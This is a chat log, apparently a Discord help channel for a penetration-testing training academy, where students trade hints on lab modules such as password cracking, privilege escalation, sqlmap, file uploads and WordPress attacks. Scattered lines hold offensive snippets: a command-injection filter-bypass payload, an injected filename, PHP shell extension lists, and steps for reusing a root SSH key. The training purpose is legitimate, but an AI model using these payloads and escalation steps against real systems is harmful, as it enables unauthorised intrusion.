Now I'm stuck, after trying different hybrid modes, including ones that were obvious, I'm still failing.
I tried some random hybrid modes such as ||-a 6, while the appended mask is ?d?d|| , and still failed.
Would appreciate any little hint. Currently stuck for over 10-15 minutes on it.
jesus fking christ I solved it literally 1 minute after asking for help
LOL
proof that you shouldn't over complicate things
Hey guys! Can someone help me with the "Skills Assessment - SERVICE LOGIN" from the module "LOGIN BRUTE FORCING"? I tried all possible custom username- & password-lists for days, but not making any progress. Even more i think i get more confused by every hour i invest, as at some point i lost a little bit the overview of what i tried and what not...Greets
hello
use the name from previous exercise
starts with h
Anyone help with LFI assesment? So stuck
hey there! i need help with the priv esc in ||getting started > priv esc || after getting the || lateral movement to user2 ||, can anyone give me some more hints ? thank you ❤️
I'm so stuck on the getting started module at knowledge check, I gained a shell on the box but idk how to privesc. I ran linpeas on the box and sudo -l shows nopasswd /usr/bin/php but im lost on what to do 😂 any hints?
ah man how did i not think of this site, thanks ill have a look and see if i can get it
Help ?
Let me know...
okay i got it, thank you so much inturbidus, that taught me a lesson 🙂
i was stuck for 2hrs and and 2 commands fixed it 😄
Just bookmark that site, mate
yeah i have it bookmarked, but for some reason i didnt think of it
dude the hashcat skill assessment task has some kind of problem
I cracked 50% of the passwords, did some Bash scripting for text processing, implemented a python script to return the 10 most frequent passwords, and the 7th most frequent one was the answer
I scrolled back here and apparently one dude had the same issue but only his was the 5th most frequent one
--username ???
bruh
I've used hashcat in the past
--username was more than obvious to use
I haven't and got the answer. 🙄
hey there! i need help with the priv esc in ||getting started > priv esc || after getting the || lateral movement to user2 ||, can anyone give me some more hints ? thank you ❤️
what was the highest frequency?
that's what my python script returned (467 is the amount of passwords cracked, and the list under it is the 10 most frequent words in a descending order)
anyone help with a quick sanity check on Shells and Payloads module? The first question in the section "Laudanum, one webshell to rule them all", has a question about an absolute path. I have the correct answer, but it doesn't seem to want to take it. Any help would be appreciated!
I don't know how to code. Got everything done with hashcat and a few | 's.
used those as well to process the cracked passwords
||cut -d: -f2 > passwords||
do you remember what was the highest frequency?
like was it more than 1?
I'm genuinely curious
Do you mean how often the password was used?
yea
I did not even crack all of them, and it was way above 1. In the 40s.
oh rah
that's more than odd
||NTLM||?
or did you also use ||md4||
because they have the same hash characteristics
||-m 1000||
then we literally did the same thing
lemme try ||900||
yup still doesn't make sense to me
look at linenum/linpeas, that should give you some hints on what to do
it literally displayed a huge data dump, did not know where to look exactly
linpeas gives you some visual hints, look at the stuff thats displayed in red
also says when you start the script that red is a high pe vector, just read it
Can you just run hashcat with --username --show ? You should immediately see certain passwords used twice or more times.
Trying now
lmao
currently iterating over the results with less -FX
okk
when manually iterating through it with less -FX I can definitely see it repeating
it's odd that my python script didn't recognize it tho
so for some reason something which was not in my control filtered repetitive passwords
what that might be?
This is my formula: ||--show --username | cut -d ':' -f 3 | sort | uniq -c | sort -nr | head -3 > skill5_result.txt||
that's so odd
because I ran it with --username, and then after it finished cracking what it could, I ran it another time with --show which I then used bitwise or operators | to perform virtually the same thing you did but with less bash and more python
when running with both --show and --username in the same command, it doesn't filter the results
Learned something new 😉
none of the vulns linpeas pointed to work, as in NONE
thanks my guy
I liked your bash script, creative
onto sqlmap I go, meet you on the other side
guys, i need help with this
hey there! i need help with the priv esc in ||getting started > priv esc || after getting the || lateral movement to user2 ||, can anyone give me some more hints ????
i tried linpeas but none of them seem to work, or i can't get to compile any priv esc exploits that i searched and got on the web
HELP ?????
I see no one was able to explain. I'd love to get to the bottom of understanding it. I'll ask around and post anything I find here. 🙂
Thanks in advance. Let us know.
Let me try...
i did as user1 then did "sudo -u user2 /bin/bash"
i dont have the password for user2
So you haven't CTF for /user2/flag.txt yet?
need some help with skills assessment with FFUF
i found 3 sub-domains but i cant access them
need input if i have them right on my host file
Are you user2 now? Go to /root and ls -la - you'll find an interesting directory there
i did get the first flag in /home/user2
ok
Please clarify what you are trying to do and what does not work.
i found 3 sub-domains. i have to input those domains in my host file with the ip to access correct?
one of the questions is "Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains? (Write the extensions as '.ext', in alphabetical order separated by spaces ".ext1 .ext2 .ext3")"
Correct. /etc/hosts
when i run a scan for ext. i get an error
so i tried accessing those domains on the browser but i cant access them
so i am thinking i am getting an error due to not having the right host file input
There is not much you can do wrong there.
XXX.XXX.XXX.XXX <tab> SUBDOMAIN.academy.htb
Of course, w/o the port.
correct then i have it right. So now i am thinking i have the wrong command
Could be. You can post it here but wrap it up as a spoiler.
okay. give me a minute
.ssh/ is the only one but, i can't edit the files in it
BTW, I ran an individual command on each of these three domains and did not run it on all three with one command.
Why do you need to edit it?
ssh exploit , to reconnect as root directly ?
Bingo. Just go along with what you have learned on that page.
it's not giving me much tbh
If we can read the /root/.ssh/ directory and can read the id_rsa file, we can copy it to our machine and use the -i flag to log in with it
Quote from that page.
nevermind! GOT IT ❤️
Did you get it? (don't forget -p XXXXX)
Keep it coming, mate
isn't sqlmap considered lazy in the real world?
I get that it's an awesome tool, but wouldn't offensive-Sec employers expect me to be able to manually perform every injection sqlmap has implemented within itself?
talking about sqlmap, I'm in the attack tuning section, I captured the flag of the tables flag6 and flag7, but I can't capture flag5's.
I ran it at first with ||--level 5 --risk 3||
I mean, I get the flag5 table returned when running sqlmap, and it has columns and everything, but it returns an empty table.
So, I immediately thought that it might be an ||OR|| injection, so removed the ||--level 5 and kept the --risk 3 since OR requires a high risk level||, but that still returned an empty table.
So, I tried adding features such as ||union manipulation (such as --union-from and even --union-col)||, tho it didn't help.
Would love any hints/explanation why that might occur so I could further attack this issue.
(safe to mention that I tried manually injecting the payloads that sqlmap pointed to during the detection, and no flag appeared there as well)
OSINT Corporate Recon: I'm struggling with the format of the latitude and longitude coordinates of the first task within "Locations". Can anyone help me with the format?
Hey guys, about to get a obdo port II what canbus tools would you recommend in order to drive with a console controller ?
For Boolean-based sqli, sqlmap will automatically decide on a success string, denoted by output like
[INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --string="31")
But sometimes this string is not correctly identified by sqlmap. So it is better that you specify this part manually
Any help with the "What command would she type to serve the shell..." question of the Shells and Payloads module would be appreciated. I have a command that works, but it does not accept it as the correct answer (does not give me the "Incorrect answer!" popup either though)
Talked with support. Apparently might just be a technical issue
Anybody on hacking wordpress module skils assessment?
“Hit [Ctrl + R] to send this to Repeater so that we can look at the response.”
What does that mean? What’s repeater? Is that a Firefox shortcut to resend a URL?
still blank
the detection ended up being timebased, so this wasn't exactly the case (although it did identify a boolean-based blind).
though with the help of @west canopy who recommended running it on a pwnbox, turns out indeed the only thing that differentiated me from capturing the flag was me running sqlmap on my VM - classic
Thx anyway
Looking for a little hint:
On the "web Proxies" module, I'm on the section where you are using Burp to fuzz for .html files to find the flag under /admin/.
Should I be using the same wordlist or should I be using a modified version? Since I can't seem to find the file within the time limit, I assume I'm missing something.
Hi
am getting error while I run the python script on Linux Machine (10.10.10.3)
File "usermap_script.py", line 8, in <module>
from smb.SMBConnection import SMBConnection
ImportError: No module named smb.SMBConnection
Hey, has anyone managed to get the dns-axfr.py script running from module 27, DNS Enumeration Using Python?
I finally managed to get it to throw exception errors, needed to install dnspython3, but I'm still unable to resolve ns1.inlanefreight.htb and ns2.inlanefreight.htb. domain has been added to my /etc/hosts
Actually, managed to get past my initial errors (did a restart of my kali instance after adding the nameservers to my hosts file). However now I'm getting a different exception:
$ ./dns-axfr.py
[+] trying AXFR with nameserver: ns1.inlanefreight.htb on domain: inlanefreight.htb
[Errno 113] No route to host
[+] trying AXFR with nameserver: ns2.inlanefreight.htb on domain: inlanefreight.htb
[Errno 113] No route to host
No subdomains found.
Ahhh managed to get it. Had to respawn the machine and reconnect my vpn 🙂
hey
Hey there! I am stuck on the file upload attacks module, the whitelist filter section. I can upload the shells but I can't run any of them. I've tried the following extensions for my shell .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc. No one of them works though. Any hint would be appreciated.
can anyone help with the intro to python course, i'm stuck on the 'further improvements' slide and can't seem to get my script to work
Nevermind my question I figured it out
damn why is the skill assessment of sqlmap so fking long - literally takes 10 seconds to pull a word of size 10 characters, and I'm on a pwnbox! lmao
alrighty, got it
still odd that they expected us to just randomly pick a ||tamper script||. I only got it because I remembered in one section that they talked about the most popular ||tamper script||.
Original problem with open VPN: ERROR: Cannot open TUN/TAP dev /dev/net/tun: No such device (errno=19)
I tried using: modprobe tun ,but this is what i get
FATAL: Module tun not found in directory /lib/modules/4.4.0-19041-Microsoft
I also tried: find /lib/modules/ -iname 'tun.ko.gz'
but nothing was found
When I tried: insmod /lib/modules/3.6.9-1-ARCH/kernel/drivers/net/tun.ko.gz
I get this: insmod: ERROR: could not load module /lib/modules/3.6.9-1-ARCH/kernel/drivers/net/tun.ko.gz: No such file or directory
Please create a support ticket.
where are the support tickets made?
Is there any module for teaching wireless attacks?
Been iterating over module descriptions this past few minutes and can't seem to find one going in depth on wireless attacks
Nope
But in the hashcat module it says that there is one coming soon
You can brute force it
Hey, My internet is not working in my Workstation. And now i am on introduction to the Academy. I am a beginner... Can someone help to get rid of this problem
Wdym “you can brute force it”
Yea I also saw that, tho it was mentioned as if it’s already existent
I am wondering how you can "practice" attacking a WIFI network.
Hi. I have some problems, i created a new account on HTB Academy, when i subscribed to one month plan, i received a bill but nothing changed on my account, always my account is on free plan
pls contact support
Thank you
Have you found a solution? I am in the same place.
you can use burpsuite and load a file with different sql injections and it will try all of them
is there a chance to have a vpn instead of going with the machine in the browser so it runs smoother 🙂
Yes, in some modules you can download a VPN key. You can then use this to connect via VPN and use your own system.
Did you make it?
I am stuck in the same place
ah no I'm talking about knowing how to write an actual injection. As in, sqlmap was written to try extremely complex queries, so I was wondering whether I should really be able to come up with such queries on an OSCP exam for example.
your own wi-fi? I mean, as long as you know CCNA it should be fairly easy from the setup of the environment aspect, it's just that you should know the kind of tools like kerberose/mikimatz (I don't really remember the correct names/additional tools).
Has anyone completed the Main Function task in DNS Enumeration using Python?
The Task is asking me to perform a zone transfer using the DNS-AXFR.py script. I've updated the url to .htb but nothing comes back. Am I missing something?
I was wondering how HTB could emulate in an academy module a WIFI attack to practice with.
Friends who can help with Windows Local Privilege Escalation? The last two modules.
no one has ever said a practice, it could just be a breakdown without any skill assessments and with instructions on how to setup your own skill assessment environment.
Nevertheless, I'm pretty sure there are programs that allow these type of environments, such as Cisco's packet tracer.
Please can anybody help me, I am stuck on the Getting Started Module | Privilege Escalation: The question is as follows: SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.
I solved it by login through the ssh and then changing the user using su - command
but the other questions asks for: Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.
I tried copying the contents of the id_rsa file as i had the read access and then i tried logging in using the same using the -i parameter. But it's still asking me for the password of user two.
Just to mention: I restricted the id_rsa permission using chmod +600. I also checked if i have copied everything correctly using wc -l command
Any help would be very much appreciated. Thanks in anticipation.
Anyone available to give me a nudge on the skills assessment on SQLi?
u ssh with root@ip to the server? or with user2@ip?
Hi all! I am doing the skill assessment for the Getting Started module. I have RCE and have confirmed that my attack box is reachable (pinging my ip using said RCE works), but when I try and spawn a reverse TCP shell, I cant seem to get a connection on the port im listening on :/ is there something obvious I may be missing?
@copper creek with user2@ip
Never mind I figured it out
nvm what i wrote, i read that as if u were trying to ssh as root
@copper creek Thanks alot brother
@copper creek i just tried ssh using root@ip and it worked. I got the root.txt finally. Thanks again
.
Hey i'm stuck on the Skill Assessment in Academy Directory Traversal, can someone help me?
bro in the academy classes my workstation is not showing any internet connectivity... HELP ME...
so I'm at the end of the Stack-Based Buffer Overflows on Linux x86 module and the last question is killing me "Read the file "/root/flag.txt" and submit the content as the answer." could someone give any tips on it ?
Did you ever get any help with this? I'm stuck here as well....
I can't even get it to scan the domain, just the IP.
Isn't you have to execute a shellcode to get a shell and then cat the flag ?
Unfortunately no. Still waiting for a tip 😄
I was afraid of that. Lol. I feel like I'm missing something fairly simple?
Can anyone pls help me with the "Getting Started WordPress Backup-Plugin" after 5 Days i give up ...
Hey Guys.. I haven't been here for a while. It has changed a lot. Where can I ask questions about the modules? Before this had a room for the fundamental/easy/etc.
Hi guys anyone who can help me in wordpress hacking skills assessment i am stuck with metasploit shell upload.
I am doing the File Transfer module on HTB Academy and ran into a problem. I am testing the commands by hosting files on my Kali VM and downloading them from my Windows computer. When I run the PowerShell download command, it says unable to connect to remote server. The server IS up because I can go to Kali's IP address or do "localhost" and the files are there. I can download the files on my Kali VM with wget. I also tried going to the Kali's IP address on my phone but the server seems to be down, at least on my phone and windows computer. What does this mean?
@quiet halo Are they on the same network/subnet?
If so, make sure that your Kali VM's firewall is not blocking traffic.
Yeah. The VM is on nat network and has the same subnet. I disabled the Kali's firewall via ufw and the problem still persists.
Any feedback here? Could one of you please check if the login for user "svc_backup" in windows privilege escalation - Windows Built-in Groups is working? I'm still receiving "The user name or password is incorrect. Try again."
that's the one. After i execute the shell the nc never gets a response from the code.
@ebon inlet i found ur retired web chall write up its nice 🙏
stuck in "getting started" module on the "privilege escalation" part. Got from user 1 to user 2, got id_rsa private ssh key from root directory, created on my system id_rsa file with content identical to id_rsa on the target machine, but it doesn't let me connect to root with this key.
it says Load key " "id_rsa": invalid format "
maybe its outdated? or i did smth wrong. btw chmoded id_rsa key, as it says in the hint
thats full output with verbose option
what does the error say to you?
invalid format. I thought that there may be an issue with -----begin openssh private key----- and the same on the end. tried to play around with content. didn't seem to work.
how can you figure out if the ssh key is formatted / copied&pasted correctly?
i visual matched the beginning and the end of the key on the server and in my file.
^ solved
👍
Hello.
Am looking for some help for Broken authentication module, part Predictable reset token question 1.
Am stuck since few weeks at this question, and i really don't understand what i am missing.
I would appreciate some help. Thank's a lot
Are there any modules that cover ghidra, r2, gdb etc?
Hello, how can i get pretty TTY in nibble or in last task of module Getting Started? There is no python available on target pc, so i couldn't use python -c 'import pty; pty.spawn("/bin/bash")'. Answer: look for python3.
@quick trellis I'm not able to DM you the instructions. Please check your Discord DM security settings and try again.
the machines of the academy don't work
Hey guys. Im doing the module "WINDOWS FUNDAMENTALS" in the "Skills Assessment - Windows Fundamentals" is asked to create a security group but in my search it can only do it in windows server. Can you help me?
open computer management and go to local users and groups, should be able to create it there
I can but not with the security. Just a normal group
cant remember exactly but for the module add a normal group and you will be fine
Well I tried with the normal group and the correspondent Sid wasn't the correct answer
Heya, y'all. I'm doing the 'Getting Started' module and the Public Exploits class. Aside from some other issues I'm having, I think Netcat's decided it now just hates me. If I attempt to use it, it returns nothing at all, then exits as in the screenshot attached. I've tried restarting the terminal and the VM to no avail, and I'm certain 53 is an open TCP port. Any help or advice would be much appreciated.
try adding -q 3
ahh, i did try that and it didn’t work, think i tried -q 20 too and still the same
How about telnet, what happens when you opt for it?
apologies, i’m pretty new;; how would i do that?
Before that, try: nmap -p 53 46.101.51.163
And see if you get a hit
For telnet: telnet 46.101.51.163 53
i seee, lemme give that a shot!
had to restart target so ip is different, but here's the responses;; this is what comes back
where do i go from here if i'm trying to grab the banner?
If by banner you mean the message then it should appear once you connect.
Hm,, I'd presume the 'connection closed by foreign host' is an issue, cause nothing came up before that..
Though this might be the wanted behavior by the host, so you need to know whether you are supposed to connect to that service or not.
fair point, i'll scan some of the others
they all came back with connection error 10060, which is a timeout i believe
I need help … I am in the Academy and stuck with the first problem …. I have a target with wordpress simple backup but the exploit gives me an error :( I have been trying for 6 days now with that exploit
I am in the Getting Started tab:(
its odd, because i now recall that i’ve used netcat successfully before;; as in, i’ve tried using it in previous classes and it’s worked fine, but now has decided to just give i spose
Could someone please help me out? I'm totally new to this and I don't understand what answer they are looking for. Keep in mind this is in the super beginning part of the learning academy, so specialized attacks like brute force can't be it. It's gotta be something super simple, and I'm just overthinking it...or am just that dumb....
Send a GET request to flag.php with two parameters num1 and num2 such that their sum is 1337.
Could someone help me with the module of Wordpress ( skill assessment) I’m stuck in the question of getting the shell I did a brute force but it didn’t work so I don’t know where could I get the passwords
I'm not that far yet, but if you have a hash you could use cyberchef
If you still need help dm me.
Can i DM you with the Same issue?
Are you sure you need netcat to CTF in that class?!
is it supposed to have something here?
Ok so it turns out I was a dumbass and didn't need netcat, but I've got one last issue to overcome. I've found the right exploit to use for the metasploit (i'm certain it's correct, it's the plugin plastered all over the webpage), but this is the only return I get when I run it; no output of any sort is printed. Here's the options and the output I've got every time. I've tried setting the port to 80, setting the path to '/flag.txt', but no avail on anything so far.
Any help would be sincerely appreciated.
what is the module and task?
In that screenshot, it shows /flag and not ||/flag.txt||
Mhm, I've tried that and it's done the same; not come back with a result.
Have you tried the right path and the right port together?!
- show scanned services
- then use msfconsole to find exploits which grant u access to remote host (reverse shell)
...
i am a total idiot. I had not! Got it all sorted out now, thanks for pointing that out!
Gods I feel so dumb ahahah-
use: nmap -sV -Pn <target_ip>
u will get a list of open ports with service names, after that go to msfconsole and find exploits for the found services. Some of them require a certain version of the service. Look for exploits which grant u remote access. If u found one such exploit then use it.
if the open service is httpd - a web server - go to the browser and paste the ip address of the target, then look at the source code, maybe u will see something interesting
for example a path to go to next, then scan with gobuster for plugins and search for exploits in msfconsole for that plugin
Who can explain nmap's option -Pn? Why without this option sometimes nmap cant scan host?
@stark tapir man nmap
In the Navigation section of Linux Fundamentals. The first question begins with “SSH to with user ‘htb-student” and password ‘HTB_@cademy_stdnt!’ “ SSH to what? Did I miss something?
did u connect to the vpn before scanning ?
ssh htb-student@IP-ADDRESS
then enter the password when it prompts
u to do so
u type this in ur terminal
Thank you. I used my VPN IP. Is that right? Accepted the warning, but then it didn’t accept the password.
use the target ip u get when u spawn the target
not yours
Oops! Duh
yea
I used curl -X GET and assigned values to num1 and num2 that equal 1337. If you need more help DM me.
Thanks!
i have no problem with this task. just asking about -Pn because i want to understand what this option actually does on a low level.
use the option --packet-trace
nice, thx
does it tie with half TCP protocol SYN method?
try it out
ok
Random question about the academy 'cubes' as the site doesn't really explain it at all. Can I just ignore the whole subscription thing and just buy cubes to access the Junior Pen testing track? There seems to be no indication as to how much Pwnbox usage comes with just buying cubes (if any), but I'm assuming you must have them in order to actually do the course content.
Yes you can just buy cubes.
Thanks. And what about pwnbox usage? The subscriptions say they have unlimited usage, but what about with just cubes?
I have a sub, but I believe you are limited with just cubes. You can however download the vpn key and do pretty much everything from your own box if you have one.
Thanks. This academy is so weirdly set up. I don't get a lot of its logic. (if there is any) Even the best subscription only allows access to Tier 2 content. Bizarre.
I havent worked up that far, just started tier 1
Me either, I was just trying to decide between this product and the TryHackMe one, so I was looking at the entire learning journey to see what would be available. I'm guessing the academy is quite new though, since a lot of the content says 'coming soon' and a lot of the onboarding isn't very well thought through. Maybe they just need time to improve.
I have tried the PEH course from cybermentor and I like this quite a bit better. I feel like they do well on giving you basic info but this bash thing I am stuck on is killing me lol
I'll give it a try and see, but not too optimistic so far haha.
you get 40 cubes for free to start. that will get you thru all of tier 0
Hello everyone
I was wondering if there is any support group with write ups the modules htb academy?
I am trying to solve the module of cross-site scripting XSS and web attacks but I run into doubts and little support in the intro
I have been looking for support in other forums like reddit but apparently it is not as popular academy as tryhackme in topic of solutions or community of support
I believe we don't allow writeups for modules above tier 0
Thanks I did not know that rule
Anyone free to chat re the knowledge check in getting started mod? Having an issue with msfconsole I'm not sure about and the Google has failed me
hi everyone!
I'm having trouble finding the VPN file to connect to HTB academy
can anyone advise :)?
Check this out: #modules message
it worked!
😄
oops wrong channel lol
😄
I dont see the vpn key option 😦
the normal htb vpn gives me access to the box though
oh wait, I can access the box from outside the vpn
haha 😄
thanks @high zinc
im dumb lol
I don't blame you, so am I
hmm... whats strange is that I cant get a callback on my netcat listener
or tcpdump looking for icmp
hehe 🙂
loving academy so far though 😄 the content is awesome
I never even knew ssi existed
facepalm lol
😆
can someone help on the web proxies skills assessment? doing smth wrong when trying to fuzz the last character of the decoded md5 cookie
@copper creek DM.
ahh ok
any news when the junior program will have all the modules completed
Hi, I get the error "Exploit aborted due to failure: unexpected-reply: Failed to upload the payload" on attacking wordpress (attacking common web applications module) at question 4: Following the steps in this section, obtain code execution on the host and submit the contents of the flag.txt file in the webroot. What am I doing wrong?
If you still need help DM me.
hey, also stuck in the skills assessment, got XXE but no RCE
same, already got XXE, but seems RCE it's needed to get to the flag
feel free to DM anyone troubled with File Uploads module
If you notice that some part must be marked as "spoiler" just tell me. This is my first post.
Hi community I'm having a hard time with the "POST method" section from "web requests" module.
What I have figured out until now:
1- I make a POST request with login data.
2- The server says, "ok I can recognize your credentials here is your cookie for further
communications"
3- I inspect that cookie to see if I can change something to make the server believe that
I am another user.
4- I change a part of the cookie and send a GET request with the modified cookie.
5- The server responds with the admin/dashboard.php greeting me with my modified data in the html.
Problems:
1- 0 clue about what is the expected answer.
2- No matter if I try with the user "iloveham", the server response is a kind greeting.
3- I have tried to decode the part next to the user: xxxxxx_hash but with no success.
4- I have compared the responses from the server in two scenarios, first: without altering the cookie,
second: changing part of the cookie, and the responses are exactly the same.
This part is useless but helps with self-pity:
I have given at least 3 hours a day for 6 days to this exercise.
I have read about cookie poisoning. (to gain a big picture view about the subject)
I have read about how php encrypts or encodes. (to try to reproduce the hash part of the cookie)
I have read about encoding to produce a hash like the one provided by the exercise. (at least with the same structure, length and sum for example)
ANY kind of guide will be very very appreciated.
@gleaming spindle You don't need to waste 18 hours for one question. DM me.
@main vapor is a certified noobs rescuer
im kind of stuck in this exact same question, can i dm for a tip ?
@icy mist DM me.
Have you found a solution to the problem?
I am stuck here too. Do you have a hint for me?
@acoustic owl DM me.
Hi everyone! I have a question about the SSI module. I used burp, and none of the traffic I captured had the .shtml .shtm or .stm extensions. I thought this was needed to parse SSI and do an SSI injection.
If anyone could help me understand, I would greatly appreciate it
🙂
can confirm 
I have a question about the module 35 GET method, pls dm
Ask your question
Send a GET request to flag.php with two parameters num1 and num2 such that their sum is 1337., this is the question and i try a lot of things but nothing is correct.
Google how to set parameter in a get request using curl
you'll find it
easily
i guess i shouldn't do it with curl
Just use your browser, that should do it.
Folks, I can't send any message to any other channel as I recently joined.
However, I wanted to clarify something out, I directly connected to HTB without a VM briefly and then realized, do you think I put myself at big risk? What can I do now?
hi everyone! Is there a specific channel for certain modules in the academy?
I only see modules and erratum on my discord
academy is awesome 🙂
I saw an assembly module but didnt see a reverse engineering one. Would be awesome to see a module about RE with IDA now that the freeware supports x64 😄
Has anyone here done the dns enumeration python module? Looking for help
anyone having issues spawning a target?
How long should it take to complete the bug bounty pathway? Also, is doing HTB, Pentesterlab, and Portswigger all at once too redundant?
Would doing bug bounty path on HTB academy and portswigger academy be more than enough to begin bug hunting?
I'm working on chmod and chown and I had a question. I'm working inside my own box and I created the file 'shell' and I used chmod 777 so everyone can read, write, and execute it. Then I tried chown to change it to root (like the module says) and I get a 'operation not permitted'. If I switch to root, I can run the command. Why can I not run this command as a user?
Hi, why does the command sc qc wuaserv not return anything in powershell? Module Windows Fundamentals. Ah ok, it works only in CMD.
What are CPE credits submission on billing page under Silver Annual subscription?
hi guys/ Can anyone help me with academy "BROKEN AUTHENTICATION" ?
I stuck in Guessable Answers
@rustic sage DM me.
Hi, can anyone help me to run the Joomla! Directory Traversal exploit (https://www.exploit-db.com/exploits/46710) i get an error with python2.7. (Attacking common web apps)
hey i got a question about the Module getting started, it's about the last question in the service scanning section. How can i know or test what Bob's weak password is?
hello I cant get access to RDP anymore, it worked earlier when I started the course (windows fundamentals 1)
Hi, need some help with Web Attacks - Bypassing Security Filters question. Can't get it to work, keep getting 'Malicious Request Denied!' on every method. Even done the skill assessment, but can't get this one
Solved?
hi guys.. could use a nudge on the skills assessment portion of the Server Side attacks module
would really appreciate it 🙂
nah
If you read that page, you should know the password...
good evening, im currently working on the Section "Service Scanning" in the Module "Getting Started", and when i run the command nmap --script smb-os-discovery.nse -p445 10.129.165.121, my output is
`Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-05 15:00 EST
Nmap scan report for 10.129.165.121
Host is up (0.026s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 3.47 seconds`
im missing something like the
Host script results: | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: CEO-PC | NetBIOS computer name: CEO-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2020-12-27T00:59:46+00:00
does someone here know why?
Aside from this, you have to scan port 8080.
does it say it there or only how to get it?
okay this just changes the
PORT STATE SERVICE 445/tcp open microsoft-ds
to
PORT STATE SERVICE 8080/tcp open http-proxy
Man, it's in front of your eyes. Can't say much more
Ehm. Did you get the question clear? They want to know what's running on 8080. That's it. (And what do you mean "just"?!?!)
Hi everyone... do the skill assessments at the end of the module cover things out of the scope of the module?
lol ok nevermind
i need to read better
I was trying default app creds instead of the creds from the instructions
Great question. CPE is short for continuing professional education. We have a deal worked out with (ISC)^2 that allows HTB Academy students to earn CPEs towards renewing any (ISC)^2 cert. Take for example someone who has achieved the CISSP certification. They can work through Academy modules and earn credits towards having their cert renewed prior to the expiration date. Here's an even more detailed explanation: https://www.hackthebox.com/newsroom/htb-academy-cpe-credits-and-student-subscription
hahaha 🙂
oh i wasnt talking about the question, i was just confused that it didnt show the same thing like in what they did above
It would not be too redundant but you would want to be sure to pace yourself & make sure you are truly understanding the concepts you study. I recommend making a study plan for yourself and even schedule time throughout the week to work through content you are interested in.
Ok. So I should do all three?
Would it be reasonable to complete all three in nine months?
It depends on how much time you can dedicate daily, weekly or monthly.
Let’s say I am doing it six hours a day most days
Because I have a lot of time on my hands
I bet you'd get through it in 9 months at that rate but again don't focus too much on how fast you get it done. Focus more on how well you understand the content.
No problem feel free to ask when you have questions. Good questions help everyone get better imo.
man academy is awesome 😄
Thanks. We are hard at work making sure each module is excellent. Keep the feedback coming, it helps.
Hey =)) Any tricks for bypass NoMachine Connection on Shell and payloads Module in the live engagement section ??? Can't ssh the FootHold VM
Is the target spawning for XSS Phising broken? I can't do anything with the target
im new
greeting earthlings
hi
Hello, i need help with HTB box Horizontall, i found a flag, but can't submit it on site, because button is grey, any advice?
Hi, could use some help with Web Attacks - Bypassing Security Filters, can't bypass the command injection filter. I think I've tried all verbs now.
Any changes when you move slider with difficulty rating?
oh nice, thanks )) owned my first box!
Nice, congrats! 🙂
Hi, I'm having trouble answering the module "command injections" section "Bypassing Other Blacklisted Characters" with the following question: Use what you learned in this section to find the name of the user in the '/ home' folder. What user did you find ?. I have tried multiple answers without being able to get results, the payload that I think should work is: "127.0.0.1 ${LS_COLORS: 10: 1}${IFS}ls${IFS}${PATH: 0: 1}home" , but I get no result, I have also tried to replace the semi-colon with the Character Shifting technique but some characters are blacklisted. Could you help me? I've been with this answer for two days. Thanks
I got the answer by cheating a bit in the next section listing the system users
Anybody finished hacking wordpress
I am in skills assessment
Wpscan scan shows host is not running wordpress
I managed to get this by building on previous section. DM me if you still need it
are you trying the correct site? DM me
Can someone explain me this ? I understand the sed command but not the rest of it.
Try connecting to the target via Nomachine and setting up SSH.
Has anyone here done the OSINT module? I might be missing something but I'm struggling on the lat/long
Why do i have to pay for 2 virtual machines?
Thanks 👍 👌
You mean more than one pwnbox spawn in a day? Because money doesn't grow on trees and hosting this stuff costs money. 😁
This is manipulating the file "william.txt" using Regex. Start with this if you are new to regex: https://www.regular-expressions.info/tutorial.html
Anyone done Web attacks recently? Can't get that one, and I'm out of ideas, any help appreciated - To get the flag, try to bypass the command injection filter through HTTP Verb Tampering, while using the following filename: file; cp /flag.txt ./
Hey guys I'm doing the osint: corporate recon. I got the coordinates for the answer fields, however every time I hit the submit button it just hangs. Has anybody had this issue? It happens with this symbol ° It is with the fields marked with (format: ... ) Thanks.
DM me
English please 
Hey guys! Would appreciate some help with "Attacking Common Applications - Skills Assessment I". I also did some research here in the forum after a few days without success, but can't ffuf the mentioned directory. would be very happy about a DM!
Hi everyone! I'm stuck on the Skills Assessment for the Server-Side Attacks module. If anyone could help me out I would be forever in your debt 🙂 . Feel free to DM 😄
where can you give a review on a specific module?
you can dm me if you still havent gotten it
Thank you, it's solved now. Thanks to @heady canyon
ah ok
I really like the new server-side attack module! I didn't know SSI was a thing before having gone through the module. Very cool!
if anyone has a sec to give a nudge on Getting Started module, section Knowledge Check
i'm working on getting a foothold
Hey buddies
hi 🙂
Hi, is there any way to determine what user is running a service like proftpd? The question is in the "LINUX FUNDAMENTALS" module in the "Filter Contents" section. I saw the user in the config file but I want to know if there is another way
thanx
@warm quiver hello friend, I was stuck with that for some time until I decided to do the exercise with burp instead of curl, with curl it was impossible but when I tried with burp it worked at the first attempt....
Now I need some advice with the previous question about POST method, I cannot get the correct answer no matter how hard I try...
Have you figured out the lat/long bit? I am struggling on that one. When I hit submit it just hangs there and doesn't give me the cube.
I've DM'd you

There is! Try playing with ps - just ping me if you need another hint.
can someone help me with the POST section of the Web Requests module, I'd already answered all other questions in that module, but this one is laughing at me, the hint points to cook the cookie, but no matter what I put inside it nothing works...
Friends who can help with Windows Local Privilege Escalation? The last two modules.
Hello I need some help using the ffuf tool, can't get it to bring up the results at the end it runs through the scan fine
At which section of that module are you holding?
Can anyone help me with the File Upload Attacks? Im stuck with the Type Filters
Dm or ping me
Vhost Fuzzing on Attacking Web Applications with ffuf
but I had to use gobuster for the previous section ones because of the issue
Information Gathering - Web Edition
Why are these addresses not on the list?
What exactly is the issue?
Hey guys! Can someone give me some help with "Attacking Common Applications - Skills Assessment I"? Am stuck there for a few days and running out of ideas how to continue. Greets!
Hint:Why 127.0.0.1 two?
